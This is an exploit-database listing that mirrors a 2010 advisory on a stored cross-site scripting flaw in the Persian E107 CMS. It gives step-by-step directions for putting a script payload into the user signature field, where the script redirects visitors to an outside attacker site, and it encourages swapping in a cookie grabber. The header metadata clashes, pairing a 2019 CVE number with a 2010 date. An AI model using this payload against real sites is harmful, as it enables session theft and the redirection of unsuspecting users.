Advertisement






Persian E107 cross site scripting

CVE Category Price Severity
CVE-2019-9834 CWE-79 $500 High
Author Risk Exploitation Type Date
Persian Security Researcher High Remote 2010-06-04
CPE
cpe:cpe:/a:e107:e107
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2010060009

Below is a copy:

========================================================================================                  
| # Title    : Persian E107 XSS Vulnerability            
| # Author   : indoushka                                                               
| # email    : [email protected]                                                   
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)                                                                              |
| # Web Site : www.iqs3cur1ty.com/vb                                                                                                                                   
| # Script   : Powered By Persian E107 BY Iranscripts.Com | Sponsor : MehrHost.Com     
| # Tested on: windows SP2 Franais V.(Pnx2 2.0)       
| # Bug      : XSS                                                                     
======================      Exploit By indoushka       =================================
 # Exploit  : 
 
 1- After register go to http://127.0.0.1/Persian/usersettings.php 
 
 2- Edit your Signature Put this code or other's :
 
 ">"">>>><script>location="http://www.arab-blackhat.co.cc"</script>"""">
 
 use coockie Graber or what you wont
 
Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ====================
Greetz : inj3ct0r Team 
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N
------------------------------------------------------------------------------------------------------------------------


Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum